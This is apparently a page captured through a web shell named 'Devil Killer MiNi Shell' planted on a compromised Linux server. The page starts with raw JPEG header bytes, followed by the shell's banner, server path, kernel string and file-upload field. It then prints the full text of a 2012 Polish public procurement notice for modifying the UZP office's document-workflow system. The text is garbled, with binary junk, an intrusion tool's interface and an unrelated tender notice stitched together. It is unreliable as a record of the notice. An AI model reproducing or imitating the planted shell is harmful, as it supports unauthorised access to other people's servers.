JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120515/107717-N-2012.html

<p class="kh_header"><b>Warszawa: Modyfikacja, uaktualnienie, dostosowanie oraz uruchomienie produkcyjne Elektronicznego Systemu Obiegu Dokumentów w Urzędzie Zamówień Publicznych wraz ze świadczeniem usług opieki i wsparcia technicznego przez okres 36 miesięcy</b><br>
<b>Numer ogłoszenia: 107717 - 2012; data zamieszczenia: 15.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Zamówień Publicznych , ul. Postępu 17A, 02-676 Warszawa, woj. mazowieckie, tel. 22 4587777, faks 22 4587700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzp.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modyfikacja, uaktualnienie, dostosowanie oraz uruchomienie produkcyjne Elektronicznego Systemu Obiegu Dokumentów w Urzędzie Zamówień Publicznych wraz ze świadczeniem usług opieki i wsparcia technicznego przez okres 36 miesięcy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br>I.	Nazwa i określenie przedmiotu zamówienia<br>
00.	Nazwa zamówienia<br>
Modyfikacja, uaktualnienie, dostosowanie oraz uruchomienie produkcyjne Elektronicznego Systemu Obiegu Dokumentów w Urzędzie Zamówień Publicznych wraz ze świadczeniem usług opieki i wsparcia technicznego przez okres 36 miesięcy.<br>
01.	Określenie przedmiotu zamówienia
Przedmiotem zamówienia jest:<br>
Uruchomienie produkcyjne w infrastrukturze teleinformatycznej zamawiającego elementów Elektronicznego Systemu Obiegu Dokumentów (ESODOK) wraz z wykonaniem niezbędnych modyfikacji, uaktualnień oraz dostosowaniem go do obowiązującego stanu prawnego i potrzeb zamawiającego, zdefiniowanych w SIWZ. <br>
Opieka i wsparcie techniczne wraz z pracami rozwojowymi dla ESODOK świadczone przez 36 miesięcy od dnia podpisania końcowego protokołu odbioru.<br>
II.	Definicje<br>
Poszerzony słownik definicji zostanie umieszczony w SIWZ.<br>
ESODOK - Elektroniczny System Obiegu Dokumentów - oprogramowanie wykorzystywane w UZP, zainstalowane w infrastrukturze teleinformatycznej Zamawiającego. <br>
Modyfikacja - naprawa, zmiana lub dodanie funkcjonalności Oprogramowania w celu wprowadzenia zmiany parametrów użytkowych.<br>
Opieka i wsparcie techniczne - kompleksowe (w tym usługi administracyjne, programistyczne, projektowe etc.) usługi informatyczne zapewniające ciągłość działania  systemu będącego przedmiotem zamówienia, a także zapewnienie zasobów kadrowych w celu  realizacji zadań programistycznych, rozszerzenia funkcjonalności oprogramowania<br>
III. Opis szczegółowy<br>
00.	Wymagania globalne<br>
Założenia<br>
*	W ramach realizacji przedmiotu zamówienia wykonawca będzie zobowiązany do usunięcia nieprawidłowości w działaniu posiadanego systemu ESODOK będących rozbieżnościami (spowodowanymi np. zmianą konfiguracji środowiska sprzętowego i migracjami rozwiązania) w stosunku do dokumentacji przedmiotowego systemu.<br>
*	Wykonawca w ramach realizacji przedmiotu zamówienia będzie zobowiązany do:<br>
- weryfikacji prawidłowości zamodelowania procesów,<br>
- modyfikacji i/lub implementacji, określonych w SIWZ, procesów w systemie zgodnie z przyjętymi standardami notacji i kodowania,<br>
- modyfikacji i/lub implementacji obsługi zdarzeń określonych w ramach procesów.<br>
Zamawiający ponownie zdefiniował  procesy przebiegające w Urzędzie. Ilustracją graficzną przedmiotowych procesów są schematy umieszczone w SIWZ (definicje nie są zgodne z przyjętymi dla systemu standardami). <br>
*	Wykonawca w ramach realizacji przedmiotu zamówienia będzie zobowiązany do:<br>
- implementacji, określonych w SIWZ, kartotek, widoków, formularzy, wyszukiwarek, wzorów pism, raportów, słowników i statystyk.<br>
*	Wykonawca w ramach realizacji przedmiotu zamówienia będzie zobowiązany do:<br>
- przeprowadzenia kompletnej instalacji wersji produkcyjnej systemu w środowisku wskazanym przez zamawiającego (w szczególności na serwerach, dodatków na stacjach roboczych, stanowisk kancelaryjnych, oprogramowania dodatkowego),<br>
- zdefiniowania ról i nadania uprawnień użytkownikom w systemie zgodnie z wytycznymi 
zamawiającego.<br>
*	Wykonawca w ramach realizacji przedmiotu zamówienia będzie zobowiązany do:
- uruchomienia we własnej infrastrukturze środowiska testowego i udostępnienia go zamawiającemu za pośrednictwem sieci Internet w sposób zapewniający bezpieczeństwo transmisji,<br>
- przekazania kompletnego opisu środowiska developerskiego (w szczególności wersji oprogramowania narzędziowego i bibliotek programistycznych i systemowych),<br>
- przekazania kompletnych kodów źródłowych i dokumentacji w sposób umożliwiający odtworzenie środowiska developerskiego zgodnie z przekazanym opisem.<br>
*	Wykonawca w ramach realizacji przedmiotu zamówienia będzie zobowiązany do:<br>
- przygotowania integracji systemu z platformą ePUAP w zakresie wskazanym w SIWZ.<br>
*	Wykonawca w ramach realizacji przedmiotu zamówienia będzie zobowiązany do:<br>
- przygotowania interfejsu pobierania danych z systemu obecnie wykorzystywanego w UZP zakresie wskazanym w SIWZ (w szczególności w ramach sprawozdań rocznych).<br>
Architektura posiadanego systemu<br>
Warstwa programowa (Szczegółowy opis warstwy programowej zostanie udostępniony wykonawcom w SIWZ)<br>
System operacyjny serwera(ów): Microsoft Windows Serwer 2003 Enterprise/Standard, Silnik bazodanowy: Microsoft SQL Serwer 2005 Enterprise Edition/Standard<br> 
Warstwa sprzętowa (Szczegółowy opis warstwy sprzętowej zostanie udostępniony wykonawcom w SIWZ)<br>
Serwery IBM z serii x3650, macierze dyskowe IBM DS4700 , skanery<br>
IIIa. Opis funkcjonalności systemu w kontekście zadań realizowanych przez UZP<br>
01.	Odwołania<br>
Celem funkcjonalnym jest zapewnienie przez Departament Odwołań obsługi i rozpoznawania przez Krajową Izbę Odwoławczą odwołań w postępowaniu o udzielenie zamówienia publicznego.<br>
Opis wymagań<br>
W ramach obsługi odwołań należy:<br>
- zmodyfikować lub zaimplementować w systemie maksymalnie 3 procesy (w zależności od sposobu implementacji, który wybierze wykonawca zamawiający dopuszcza stworzenie większej liczby procesów głównych - oddzielnych dla departamentów) odwoławcze (w tym jeden z maksymalnie 12 podprocesami),<br>
- zmodyfikować lub zaimplementować w systemie zdefiniowane w SIWZ formularze, widoki, wyszukiwarki, kartoteki, słowniki i raporty.<br>
02.	Kontrole<br>
Celem funkcjonalnym jest zapewnienie  narzędzi teleinformatycznych umożliwiających realizację zadań Departamentu  Kontroli Doraźnej i Departamentu Kontroli Zamówień Współfinansowanych ze Środków Unii Europejskiej.<br>
Opis wymagań<br>
W ramach obsługi kontroli  należy:<br>
- zmodyfikować lub zaimplementować w systemie proces kontroli składający się z procesu głównego  i maksymalnie 12 podprocesów.<br>
- zmodyfikować lub zaimplementować w systemie zdefiniowane w SIWZ formularze, widoki, wyszukiwarki, kartoteki, słowniki i raporty.<br>
03.	Prawo<br>
Celem funkcjonalnym jest zapewnienie narzędzi teleinformatycznych umożliwiających realizację zadań Departamentu Prawnego.<br>
Opis wymagań<br>
W ramach obsługi prawa należy:<br>
- zmodyfikować lub zaimplementować w systemie maksymalnie 4 procesy prawne,<br>
- zmodyfikować lub zaimplementować w systemie zdefiniowane w SIWZ formularze, widoki, wyszukiwarki, kartoteki, słowniki i raporty.<br>
04.	Analizy i Edukacja<br>
Celem funkcjonalnym jest zapewnienie narzędzi teleinformatycznych umożliwiających realizację  zadań  Departamentu Informacji, Edukacji i Analiz Systemowych.<br>
Opis wymagań<br>
W ramach obsługi należy:<br>
- zmodyfikować lub zaimplementować w systemie maksymalnie 4 procesy analiz i edukacji,<br>
- zmodyfikować lub zaimplementować w systemie zdefiniowane w SIWZ formularze, widoki, wyszukiwarki, kartoteki, słowniki i raporty.<br>
05.	Współpraca Międzynarodowa<br>
Celem funkcjonalnym jest zapewnienie narzędzi teleinformatycznych umożliwiających realizację zadań Departamentu Unii Europejskiej i Współpracy
Międzynarodowej.<br>
Opis wymagań<br>
W ramach obsługi współpracy należy:<br>
- zmodyfikować lub zaimplementować w systemie maksymalnie 4 procesy współpracy w tym jeden z maksymalnie 2 podprocesami,<br>
- zmodyfikować lub zaimplementować w systemie zdefiniowane w SIWZ formularze, widoki, wyszukiwarki, kartoteki, słowniki i raporty.<br>
06.	Kierownictwo<br>
Celem funkcjonalnym jest zapewnienie, Kierownictwu UZP, narzędzi teleinformatycznych  umożliwiających realizację zadań ustawowych, merytorycznych i zarządczych.<br>
Opis wymagań<br>
W ramach obsługi kierownictwa należy:<br>
- zmodyfikować lub zaimplementować w systemie maksymalnie 1 proces ogólny,<br>
- zmodyfikować lub zaimplementować w systemie zdefiniowane w SIWZ formularze, widoki, wyszukiwarki, kartoteki, słowniki i raporty.<br>
07.	Organizacyjny<br>
Celem funkcjonalnym jest zapewnienie narzędzi teleinformatycznych umożliwiających realizację zadań Biura Organizacyjno-Finansowego, polegających na obsłudze UZP w przedmiotowym zakresie, w szczególności obsłudze korespondencji (w dowolnej formie wpływu i wypływu).<br>
Opis wymagań<br>
W ramach obsługi organizacyjnej należy:<br>
- zmodyfikować lub zaimplementować w systemie maksymalnie 10 procesów wraz z maksymalnie 3 podprocesami (dla każdego procesu),<br>
- zmodyfikować lub zaimplementować w systemie zdefiniowane w SIWZ formularze, widoki, wyszukiwarki, kartoteki, słowniki i raporty,<br>
- przygotować stanowiska kancelaryjne.<br>
IV. Warunki realizacji<br>
00.	SLA i warunki gwarancji<br>
SLA<br>
Poziom jakości usługi<br>
Płatność względem czasu dostępności<br>
Czas dostępności ESODOK w skali miesiąca I Wysokość należnego Wykonawcy wynagrodzenia w skali miesiąca<br>
99,7%-100% I 100%<br>
99,5%-99,6% I 80%<br>
poniżej 99,5% I 0%<br>
Płatność względem czasu reakcji na zgłoszenie oraz maksymalny czas wykonania zgłoszenia (w tym zgłoszenie: usterki, awarii, modyfikacji)-(w przypadku modyfikacji wymagających większego nakładu pracy strony mogą ustalić odstępstwa od tego zapisu w formie pisemnej) <br>
Czas od otrzymania zgłoszenia do wykonania I Wysokość należnego Wykonawcy wynagrodzenia w skali dnia zgłoszenia<br>
1h-2h I 100%<br>
2h-4h	 I 80%<br>
4h-6h I 60%<br>
powyżej 6h I 0%<br>
Gwarancja<br>
Wykonawca udzieli 36 miesięcznej gwarancji na prawidłowe, wolne od wad i nieprzerwane działanie ESODOK. Okres gwarancji liczony będzie od daty produkcyjnego uruchomienia systemu ESODOK, co zostanie potwierdzone podpisaniem, bez zastrzeżeń, Protokołu Odbioru  Prac. Dokument gwarancyjny zostanie dostarczony Zamawiającemu w momencie podpisania Protokołu Odbioru Końcowego Prac.<br>
01.	Harmonogram prac<br>
Realizacja przedmiotu zamówienia będzie odbywała się w trzech etapach: przygotowania wdrożenia, wdrożenia, opieki powdrożeniowej. O ile zaistnieje konieczność, zamawiający zakłada możliwość równoległej realizacji sąsiadujących ze sobą etapów. <br>
Etap przygotowania wdrożenia<br>
Czas trwania: maksymalnie 12 tygodni<br>
W ramach tego etapu dokonana zostanie modyfikacja systemu zgodnie z zapisami SIWZ. Etap zostanie zakończony fazą testów. <br>
Etap wdrożenia<br>
Czas trwania: maksymalnie 10 tygodni<br>
W ramach tego etapu system zostanie uruchomiony produkcyjnie w infrastrukturze zamawiającego zgodnie z zapisami SIWZ.<br>
Etap opieki powdrożeniowej<br>
Czas trwania: 36 miesięcy od zakończenia etapu wdrożenia.<br>
W ramach tego etapu wykonawca zapewni wsparcie i opiekę techniczną systemu zgodnie z zapisami SIWZ oraz poświęci na prace rozwojowe systemu odpowiednio minimum 50 rb/h miesięcznie w pierwszym roku, minimum 40 rb/h miesięcznie w roku drugim i minimum 30 rb/h miesięcznie w roku trzecim.<br>
02.	Formuła realizacji projektu
Projekt będzie realizowany w sposób usystematyzowany. Szczegółowa formuła jego realizacji będzie określona w SIWZ i umowie i doprecyzowana na początku etapu przygotowania wdrożenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>dodatkowe modyfikacje systemu, nieprzekraczające 25% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5, 72.30.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że:<br>
1) w ciągu ostatnich 3 lat przed upływem terminu składania wniosków, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał co najmniej jedno zamówienie polegające na: opracowaniu i wdrożeniu lub modyfikacji i wdrożeniu systemu teleinformatycznego, którego elementem była implementacja procesów biznesowych, o wartości minimum 200 000 zł (w przypadku podania wartości w innych walutach niż zł zostanie ona przeliczona na złotówki wg średniego kursu NBP na dzień ukazania się ogłoszenia w BZP)<br>
oraz<br>
2) w ciągu ostatnich 3 lat przed upływem terminu składania wniosków, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie świadczył lub świadczy co najmniej 1 usługę wsparcia lub opieki dla systemu teleinformatycznego przez okres nie krótszy niż 24 miesiące, o wartości średniej, w skali roku nie mniejszej niż 70 000 zł.<br>
Dopuszcza się, aby warunki sformułowane w punkcie 1, 2 zostały spełnione łącznie w ramach realizacji jednej umowy lub jednego zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, iż dysponuje lub będzie dysponował na czas realizacji zamówienia osobami, które posiadają następujące kwalifikacje:<br>
- Kierownik projektu <br>
Minimalna wymagana ilość osób: 1 <br>
Wymagane doświadczenie:<br>
- w okresie ostatnich 5 lat nabył co najmniej 3-miesięczne doświadczenie poprzez pełny (od rozpoczęcia do zakończenia projektu) udział w pracach, w tej tylko roli, w ramach jednego, zakończonego i odebranego przez Zamawiającego, projektu teleinformatycznego prowadzonego zgodnie z dowolną, określoną metodyką projektową na stanowisku kierownika projektu.<br>
-Analitycy<br>
Minimalna wymagana ilość osób: 4<br>
Wymagane doświadczenie:<br>
- w okresie ostatnich 5 lat nabył co najmniej 6-miesięczne doświadczenie poprzez udział w pracach, w ramach jednego projektu teleinformatycznego w roli analityka modelującego procesy zgodnie ze standardami BPML, BPMN<br>
-Specjaliści o kompetencjach w zakresie programowania i architektury systemu (w szczególności programiści baz danych, programiści, projektanci interfejsów):<br>
Minimalna ilość osób: 3<br>
Wymagane doświadczenie:<br>
- w okresie ostatnich 5 lat, udział w projekcie teleinformatycznym na analogicznym stanowisku.<br>
-Wdrożeniowcy<br>
Minimalna ilość osób: 2<br>
Wymagane doświadczenie:<br>
- w okresie ostatnich 5 lat nabył co najmniej 6-miesięczne doświadczenie poprzez udział w pracach, w ramach jednego projektu teleinformatycznego, w zakresie:<br>
- instalacji, konfiguracji i administracji systemami operacyjnymi Microsoft Windows Server 2k3 i wyższych<br>
- instalacji i konfiguracji silników bazodanowych Microsoft MSSQL Server 2000 i wyżej<br>
- konfiguracji i administracji urządzeniami firmy IBM (serwery rodziny x3650, rozwiązania SAN)<br>
Zamawiający dopuszcza spełnienie tego warunku  poprzez łączenie ról analityka, specjalisty, wdrożeniowca w szczególnym przypadku kierownika projektu i analityka, przy czym jedna osoba nie może pełnić łącznie więcej niż dwóch ról.<br> Zamawiający wymaga, aby osoby wskazane we  wniosku, w celu wykazania spełniania warunku dotyczącego osób zdolnych do wykonania zamówienia uczestniczyły w jego realizacji. Zmiana osoby wskazanej we wniosku będzie możliwa na wniosek wykonawcy, uzasadniony obiektywnymi okolicznościami, po przedstawieniu i zaakceptowaniu przez zamawiającego kandydatury innej osoby spełniającej warunki zawarte w  niniejszym ogłoszeniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż posiada środki finansowe lub zdolność kredytową  w wysokości co najmniej 150 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania, podpisane przez osoby uprawnione do reprezentowania wykonawcy.<br>
2.Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, na zasadach określonych w art. 26 ust. 2b Pzp zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
